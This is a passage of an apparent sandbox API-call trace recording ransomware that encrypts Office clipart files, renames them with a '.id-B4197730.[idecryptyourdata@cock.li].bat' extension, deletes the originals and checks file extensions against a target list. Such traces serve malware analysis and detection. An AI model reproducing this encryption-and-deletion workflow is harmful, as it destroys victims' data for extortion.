returned 1 [0065.423] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x4a80, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x4a80, lpOverlapped=0x0) returned 1 [0065.424] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.424] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.424] SetEndOfFile (hFile=0x368) returned 1 [0065.424] CloseHandle (hObject=0x368) returned 1 [0065.425] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.425] SetEndOfFile (hFile=0x354) returned 1 [0065.426] CloseHandle (hObject=0x354) returned 1 [0065.426] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.427] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01628_.wmf")) returned 1 [0065.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 68 [0065.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 68 [0065.428] lstrlenW (lpString=".doc") returned 4 [0065.428] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.428] lstrlenW (lpString=".docx") returned 5 [0065.428] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.428] lstrlenW (lpString=".pdf") returned 4 [0065.429] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.429] lstrlenW (lpString=".xls") returned 4 [0065.429] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.429] lstrlenW (lpString=".xlsx") returned 5 [0065.429] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.429] lstrlenW (lpString=".ppt") returned 4 [0065.429] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 68 [0065.429] lstrlenW (lpString=".zip") returned 4 [0065.429] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.429] lstrlenW (lpString=".rar") returned 4 [0065.429] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.429] lstrlenW (lpString=".bz2") returned 4 [0065.429] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.429] lstrlenW (lpString=".7z") returned 3 [0065.429] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 68 [0065.429] lstrlenW (lpString=".dbf") returned 4 [0065.429] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 68 [0065.429] lstrlenW (lpString=".1cd") returned 4 [0065.429] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 68 [0065.429] lstrlenW (lpString=".jpg") returned 4 [0065.429] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.430] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.430] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01793_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0065.433] GetLastError () returned 0x0 [0065.433] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xcb4, lpOverlapped=0x0) returned 1 [0065.436] WriteFile (in: hFile=0x2c8, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xcc0, lpOverlapped=0x0) returned 1 [0065.437] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.437] WriteFile (in: hFile=0x2c8, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.437] SetEndOfFile (hFile=0x2c8) returned 1 [0065.437] CloseHandle (hObject=0x2c8) returned 1 [0065.438] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.438] SetEndOfFile (hFile=0x368) returned 1 [0065.439] CloseHandle (hObject=0x368) returned 1 [0065.439] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.440] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01793_.wmf")) returned 1 [0065.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 68 [0065.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 68 [0065.441] lstrlenW (lpString=".doc") returned 4 [0065.441] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.441] lstrlenW (lpString=".docx") returned 5 [0065.441] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.441] lstrlenW (lpString=".pdf") returned 4 [0065.441] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.441] lstrlenW (lpString=".xls") returned 4 [0065.441] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.441] lstrlenW (lpString=".xlsx") returned 5 [0065.441] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.441] lstrlenW (lpString=".ppt") returned 4 [0065.441] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 68 [0065.441] lstrlenW (lpString=".zip") returned 4 [0065.441] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.441] lstrlenW (lpString=".rar") returned 4 [0065.441] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.441] lstrlenW (lpString=".bz2") returned 4 [0065.441] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.441] lstrlenW (lpString=".7z") returned 3 [0065.441] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 68 [0065.441] lstrlenW (lpString=".dbf") returned 4 [0065.441] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 68 [0065.441] lstrlenW (lpString=".1cd") returned 4 [0065.441] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 68 [0065.441] lstrlenW (lpString=".jpg") returned 4 [0065.441] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.444] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.444] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00019_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0065.445] GetLastError () returned 0x0 [0065.445] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x32f2, lpOverlapped=0x0) returned 1 [0065.464] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x3300, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x3300, lpOverlapped=0x0) returned 1 [0065.465] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.465] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.466] SetEndOfFile (hFile=0x340) returned 1 [0065.466] CloseHandle (hObject=0x340) returned 1 [0065.467] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.467] SetEndOfFile (hFile=0x350) returned 1 [0065.468] CloseHandle (hObject=0x350) returned 1 [0065.468] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.468] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00019_.wmf")) returned 1 [0065.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 68 [0065.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 68 [0065.469] lstrlenW (lpString=".doc") returned 4 [0065.469] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.469] lstrlenW (lpString=".docx") returned 5 [0065.469] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.469] lstrlenW (lpString=".pdf") returned 4 [0065.469] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.469] lstrlenW (lpString=".xls") returned 4 [0065.469] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.469] lstrlenW (lpString=".xlsx") returned 5 [0065.469] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.469] lstrlenW (lpString=".ppt") returned 4 [0065.469] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 68 [0065.469] lstrlenW (lpString=".zip") returned 4 [0065.469] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.469] lstrlenW (lpString=".rar") returned 4 [0065.470] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.470] lstrlenW (lpString=".bz2") returned 4 [0065.470] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.470] lstrlenW (lpString=".7z") returned 3 [0065.470] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 68 [0065.470] lstrlenW (lpString=".dbf") returned 4 [0065.470] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 68 [0065.470] lstrlenW (lpString=".1cd") returned 4 [0065.470] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 68 [0065.470] lstrlenW (lpString=".jpg") returned 4 [0065.470] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.485] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.485] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.485] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00006_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0065.486] GetLastError () returned 0x0 [0065.486] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x3670, lpOverlapped=0x0) returned 1 [0065.488] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x3680, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x3680, lpOverlapped=0x0) returned 1 [0065.489] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.489] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.489] SetEndOfFile (hFile=0x340) returned 1 [0065.489] CloseHandle (hObject=0x340) returned 1 [0065.490] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.490] SetEndOfFile (hFile=0x350) returned 1 [0065.491] CloseHandle (hObject=0x350) returned 1 [0065.491] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.492] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00006_.wmf")) returned 1 [0065.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 68 [0065.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 68 [0065.492] lstrlenW (lpString=".doc") returned 4 [0065.492] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.492] lstrlenW (lpString=".docx") returned 5 [0065.492] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.492] lstrlenW (lpString=".pdf") returned 4 [0065.492] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.492] lstrlenW (lpString=".xls") returned 4 [0065.492] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.493] lstrlenW (lpString=".xlsx") returned 5 [0065.493] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.493] lstrlenW (lpString=".ppt") returned 4 [0065.493] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 68 [0065.493] lstrlenW (lpString=".zip") returned 4 [0065.493] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.493] lstrlenW (lpString=".rar") returned 4 [0065.493] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.493] lstrlenW (lpString=".bz2") returned 4 [0065.493] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.493] lstrlenW (lpString=".7z") returned 3 [0065.493] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 68 [0065.493] lstrlenW (lpString=".dbf") returned 4 [0065.493] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 68 [0065.493] lstrlenW (lpString=".1cd") returned 4 [0065.493] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 68 [0065.493] lstrlenW (lpString=".jpg") returned 4 [0065.493] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.494] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.494] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00242_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0065.494] GetLastError () returned 0x0 [0065.494] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x1a7c, lpOverlapped=0x0) returned 1 [0065.496] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1a80, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1a80, lpOverlapped=0x0) returned 1 [0065.497] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.497] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.497] SetEndOfFile (hFile=0x340) returned 1 [0065.497] CloseHandle (hObject=0x340) returned 1 [0065.498] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.498] SetEndOfFile (hFile=0x350) returned 1 [0065.499] CloseHandle (hObject=0x350) returned 1 [0065.499] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.499] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00242_.wmf")) returned 1 [0065.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 68 [0065.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 68 [0065.500] lstrlenW (lpString=".doc") returned 4 [0065.500] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.500] lstrlenW (lpString=".docx") returned 5 [0065.500] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.500] lstrlenW (lpString=".pdf") returned 4 [0065.500] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.500] lstrlenW (lpString=".xls") returned 4 [0065.500] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.500] lstrlenW (lpString=".xlsx") returned 5 [0065.500] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.500] lstrlenW (lpString=".ppt") returned 4 [0065.500] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 68 [0065.500] lstrlenW (lpString=".zip") returned 4 [0065.500] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.500] lstrlenW (lpString=".rar") returned 4 [0065.500] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.500] lstrlenW (lpString=".bz2") returned 4 [0065.500] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.501] lstrlenW (lpString=".7z") returned 3 [0065.501] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 68 [0065.501] lstrlenW (lpString=".dbf") returned 4 [0065.501] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 68 [0065.501] lstrlenW (lpString=".1cd") returned 4 [0065.501] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 68 [0065.501] lstrlenW (lpString=".jpg") returned 4 [0065.501] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.501] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.501] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00319_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0065.502] GetLastError () returned 0x0 [0065.502] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x8e8, lpOverlapped=0x0) returned 1 [0065.503] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x8f0, lpOverlapped=0x0) returned 1 [0065.505] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.505] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.505] SetEndOfFile (hFile=0x340) returned 1 [0065.505] CloseHandle (hObject=0x340) returned 1 [0065.506] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.506] SetEndOfFile (hFile=0x350) returned 1 [0065.507] CloseHandle (hObject=0x350) returned 1 [0065.508] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.508] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00319_.wmf")) returned 1 [0065.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 68 [0065.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 68 [0065.509] lstrlenW (lpString=".doc") returned 4 [0065.509] lstrcmpiW (lpString1=".doc", 